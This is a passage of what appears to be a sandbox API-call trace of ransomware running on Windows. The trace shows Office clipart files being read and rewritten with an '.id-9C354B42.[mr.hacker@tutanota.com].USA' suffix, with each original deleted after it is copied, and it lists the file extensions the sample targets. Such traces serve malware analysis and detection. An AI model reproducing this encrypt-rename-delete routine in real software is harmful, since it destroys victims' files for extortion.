Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.389] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=17406) returned 1 [0271.389] CloseHandle (hObject=0x384) returned 1 [0271.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf")) returned 0x20 [0271.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.389] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.389] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.390] GetLastError () returned 0x0 [0271.390] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x43fe, lpOverlapped=0x0) returned 1 [0271.391] WriteFile (in: hFile=0x398, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x4400, lpOverlapped=0x0) returned 1 [0271.392] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.392] WriteFile (in: hFile=0x398, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.392] SetEndOfFile (hFile=0x398) returned 1 [0271.393] CloseHandle (hObject=0x398) returned 1 [0271.393] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.393] SetEndOfFile (hFile=0x384) returned 1 [0271.395] CloseHandle (hObject=0x384) returned 1 [0271.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.395] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf")) returned 1 [0271.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.396] lstrlenW (lpString=".doc") returned 4 [0271.396] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.396] lstrlenW (lpString=".docx") returned 5 [0271.396] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.396] lstrlenW (lpString=".pdf") returned 4 [0271.396] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.396] lstrlenW (lpString=".xls") returned 4 [0271.396] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.396] lstrlenW (lpString=".xlsx") returned 5 [0271.396] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.396] lstrlenW (lpString=".ppt") returned 4 [0271.396] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.396] lstrlenW (lpString=".zip") returned 4 [0271.396] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.396] lstrlenW (lpString=".rar") returned 4 [0271.396] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.396] lstrlenW (lpString=".bz2") returned 4 [0271.396] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.396] lstrlenW (lpString=".7z") returned 3 [0271.396] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.396] lstrlenW (lpString=".dbf") returned 4 [0271.396] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.396] lstrlenW (lpString=".1cd") returned 4 [0271.396] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.397] lstrlenW (lpString=".jpg") returned 4 [0271.397] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.397] lstrlenW (lpString=".doc") returned 4 [0271.397] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.397] lstrlenW (lpString=".docx") returned 5 [0271.397] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.397] lstrlenW (lpString=".pdf") returned 4 [0271.397] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.397] lstrlenW (lpString=".xls") returned 4 [0271.397] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.397] lstrlenW (lpString=".xlsx") returned 5 [0271.397] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.397] lstrlenW (lpString=".ppt") returned 4 [0271.397] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.397] lstrlenW (lpString=".zip") returned 4 [0271.397] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.397] lstrlenW (lpString=".rar") returned 4 [0271.397] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.397] lstrlenW (lpString=".bz2") returned 4 [0271.397] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.397] lstrlenW (lpString=".7z") returned 3 [0271.397] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.397] lstrlenW (lpString=".dbf") returned 4 [0271.397] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.397] lstrlenW (lpString=".1cd") returned 4 [0271.398] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63 [0271.398] lstrlenW (lpString=".jpg") returned 4 [0271.398] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.398] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.398] lstrlenW (lpString="FD00543_.WMF") returned 12 [0271.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.398] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1472) returned 1 [0271.398] CloseHandle (hObject=0x384) returned 1 [0271.398] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf")) returned 0x20 [0271.398] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.398] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.399] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.399] GetLastError () returned 0x0 [0271.399] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x5c0, lpOverlapped=0x0) returned 1 [0271.400] WriteFile (in: hFile=0x398, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x5d0, lpOverlapped=0x0) returned 1 [0271.401] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.401] WriteFile (in: hFile=0x398, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.401] SetEndOfFile (hFile=0x398) returned 1 [0271.401] CloseHandle (hObject=0x398) returned 1 [0271.401] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.401] SetEndOfFile (hFile=0x384) returned 1 [0271.403] CloseHandle (hObject=0x384) returned 1 [0271.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.403] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf")) returned 1 [0271.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.403] lstrlenW (lpString=".doc") returned 4 [0271.403] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.403] lstrlenW (lpString=".docx") returned 5 [0271.403] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.403] lstrlenW (lpString=".pdf") returned 4 [0271.404] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.404] lstrlenW (lpString=".xls") returned 4 [0271.404] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.404] lstrlenW (lpString=".xlsx") returned 5 [0271.404] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.404] lstrlenW (lpString=".ppt") returned 4 [0271.404] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.404] lstrlenW (lpString=".zip") returned 4 [0271.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.404] lstrlenW (lpString=".rar") returned 4 [0271.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.404] lstrlenW (lpString=".bz2") returned 4 [0271.404] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.404] lstrlenW (lpString=".7z") returned 3 [0271.404] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.404] lstrlenW (lpString=".dbf") returned 4 [0271.404] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.404] lstrlenW (lpString=".1cd") returned 4 [0271.404] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.404] lstrlenW (lpString=".jpg") returned 4 [0271.404] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.404] lstrlenW (lpString=".doc") returned 4 [0271.404] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.404] lstrlenW (lpString=".docx") returned 5 [0271.405] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.405] lstrlenW (lpString=".pdf") returned 4 [0271.405] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.405] lstrlenW (lpString=".xls") returned 4 [0271.405] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.405] lstrlenW (lpString=".xlsx") returned 5 [0271.405] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.405] lstrlenW (lpString=".ppt") returned 4 [0271.405] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.405] lstrlenW (lpString=".zip") returned 4 [0271.405] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.405] lstrlenW (lpString=".rar") returned 4 [0271.405] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.405] lstrlenW (lpString=".bz2") returned 4 [0271.405] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.405] lstrlenW (lpString=".7z") returned 3 [0271.405] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.405] lstrlenW (lpString=".dbf") returned 4 [0271.405] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.405] lstrlenW (lpString=".1cd") returned 4 [0271.405] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63 [0271.405] lstrlenW (lpString=".jpg") returned 4 [0271.405] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.405] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.406] lstrlenW (lpString="FD00544_.WMF") returned 12 [0271.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.426] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=5260) returned 1 [0271.426] CloseHandle (hObject=0x388) returned 1 [0271.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf")) returned 0x20 [0271.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.465] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.465] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.466] GetLastError () returned 0x0 [0271.466] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x148c, lpOverlapped=0x0) returned 1 [0271.494] WriteFile (in: hFile=0x394, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1490, lpOverlapped=0x0) returned 1 [0271.495] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.495] WriteFile (in: hFile=0x394, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.495] SetEndOfFile (hFile=0x394) returned 1 [0271.495] CloseHandle (hObject=0x394) returned 1 [0271.495] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.495] SetEndOfFile (hFile=0x388) returned 1 [0271.497] CloseHandle (hObject=0x388) returned 1 [0271.497] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.532] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf")) returned 1 [0271.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.585] lstrlenW (lpString=".doc") returned 4 [0271.585] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.585] lstrlenW (lpString=".docx") returned 5 [0271.585] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.585] lstrlenW (lpString=".pdf") returned 4 [0271.585] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.585] lstrlenW (lpString=".xls") returned 4 [0271.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.586] lstrlenW (lpString=".xlsx") returned 5 [0271.586] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.586] lstrlenW (lpString=".ppt") returned 4 [0271.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.586] lstrlenW (lpString=".zip") returned 4 [0271.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.586] lstrlenW (lpString=".rar") returned 4 [0271.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.586] lstrlenW (lpString=".bz2") returned 4 [0271.586] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.586] lstrlenW (lpString=".7z") returned 3 [0271.586] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.586] lstrlenW (lpString=".dbf") returned 4 [0271.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.586] lstrlenW (lpString=".1cd") returned 4 [0271.586] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.586] lstrlenW (lpString=".jpg") returned 4 [0271.586] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.586] lstrlenW (lpString=".doc") returned 4 [0271.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.586] lstrlenW (lpString=".docx") returned 5 [0271.586] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.586] lstrlenW (lpString=".pdf") returned 4 [0271.587] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.587] lstrlenW (lpString=".xls") returned 4 [0271.587] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.587] lstrlenW (lpString=".xlsx") returned 5 [0271.587] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.587] lstrlenW (lpString=".ppt") returned 4 [0271.587] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.587] lstrlenW (lpString=".zip") returned 4 [0271.587] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.587] lstrlenW (lpString=".rar") returned 4 [0271.587] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.587] lstrlenW (lpString=".bz2") returned 4 [0271.587] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.587] lstrlenW (lpString=".7z") returned 3 [0271.587] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.587] lstrlenW (lpString=".dbf") returned 4 [0271.587] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.587] lstrlenW (lpString=".1cd") returned 4 [0271.587] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63 [0271.587] lstrlenW (lpString=".jpg") returned 4 [0271.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.587] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.587] lstrlenW (lpString="FD01191_.WMF") returned 12 [0271.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.612] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=3964) returned 1 [0271.612] CloseHandle (hObject=0x380) returned 1 [0271.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf")) returned 0x20 [0271.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 